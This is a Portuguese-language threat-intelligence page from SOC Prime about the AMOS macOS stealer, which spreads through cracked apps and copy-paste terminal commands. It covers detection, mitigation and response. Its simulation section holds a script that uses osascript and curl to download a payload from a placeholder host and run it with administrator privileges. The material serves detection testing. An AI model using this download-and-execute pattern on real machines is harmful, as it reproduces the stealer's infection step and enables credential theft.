SOC Prime Bias: Médio

08 May 2026 15:45 UTC

AMOS Stealer Alvo MacOS Através de Apps “Crackeados”

Author Photo
SOC Prime Team linkedin icon Seguir
AMOS Stealer Alvo MacOS Através de Apps “Crackeados”
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório descreve uma campanha distribuindo Atomic macOS Stealer (AMOS) disfarçando-o como aplicativos crackeados ou instruindo usuários a executar comandos de terminal de copiar e colar. Uma vez executado, o malware coleta um conjunto amplo de dados sensíveis, incluindo credenciais, informações de navegador, carteiras de criptomoedas, arquivos de aplicativos de mensagens, perfis de VPN e documentos pessoais, e então exfiltra o conteúdo roubado via HTTP ou HTTPS. Para evitar detecção estática, os operadores rotacionam domínios e URLs durante a campanha. A atividade é direcionada a usuários de macOS, especialmente aqueles buscando software não oficial ou pirateado.

Investigação

A telemetria do Trend Vision One foi utilizada para reconstruir toda a cadeia de infecção, começando com downloads de aplicativos crackeados de haxmac.cc, seguido por redirecionamento por domínios intermediários, execução de scripts shell maliciosos, criação de daemons de inicialização para persistência, preparação de dados em /tmp, compressão em arquivos ZIP, e exfiltração para domínios rotativos controlados por atacantes. Pesquisadores capturaram as linhas de comando relevantes, caminhos de arquivo e indicadores de comportamento associados a cada etapa do comprometimento.

Mitigação

As organizações devem educar os usuários sobre os riscos de software crackeado e comandos de terminal de copiar e colar, aplicar controles do Gatekeeper e notarização, e limitar a execução desnecessária de scripts em sistemas macOS. Defensores também devem monitorar atividades suspeitas de curl and osascript e bloquear acesso a domínios e endereços IP maliciosos conhecidos. As detecções no endpoint devem se concentrar na criação não autorizada de daemons de inicialização, colocação de arquivos ocultos, e comportamento incomum de coleta ou exfiltração de arquivos.

Resposta

Se a atividade do AMOS for detectada, isole o endpoint afetado, termine os processos maliciosos, remova arquivos ocultos como .helper, .agent, e com.finder.helper.plist, e exclua quaisquer dados preparados para exfiltração. Credenciais comprometidas devem ser revogadas, e uma análise forense deve ser realizada em quaisquer arquivos recuperados. A infraestrutura maliciosa identificada deve ser bloqueada, e o conteúdo de detecção deve ser atualizado para monitorar os padrões de comandos observados.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação Preliminar de Telemetria & Base deve ter passado.

Racionalização: Esta seção detalha a execução precisa da técnica de adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa de Ataque & Comandos:
    Um adversário obteve uma isca de phishing que entrega uma carga útil curta em AppleScript. O script usa osascript para executar um comando shell (sh -c) que invoca curl para baixar o binário AMOS stealer de um servidor C2 malicioso, armazena-o na pasta do usuário ~/Library/Application Support/ e então o executa com permissões elevadas. O uso de osascript (um binário Apple assinado) mascara a atividade como automação legítima, enquanto curl fornece um download de rede discreto.

  • Script de Teste de Regressão:

    # amos_stealer_simulation.sh
    # Simular execução do AMOS stealer no macOS usando osascript + curl
    
    # 1. Definir URL malicioso (usar um espaço reservado inofensivo para segurança)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    
    # 2. AppleScript que executa um comando shell para baixar & executar a carga útil
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    
    # 3. Executar o AppleScript via osascript
    echo "$APPLESCRIPT" | osascript
    
    # 4. Pausar brevemente para permitir a execução da carga útil
    sleep 5
  • Comandos de Limpeza:

    # cleanup_amos_simulation.sh
    # Remover artefatos criados pela simulação
    
    # Remover a carga útil baixada
    rm -f /tmp/payload.sh
    
    # Revogar quaisquer processos temporariamente elevados (se ainda em execução)
    pkill -f "/tmp/payload.sh" || true
    
    # Opcionalmente, limpar o histórico de execução do AppleScript
    # (macOS não retém um histórico persistente para osascript)
    echo "Limpeza concluída."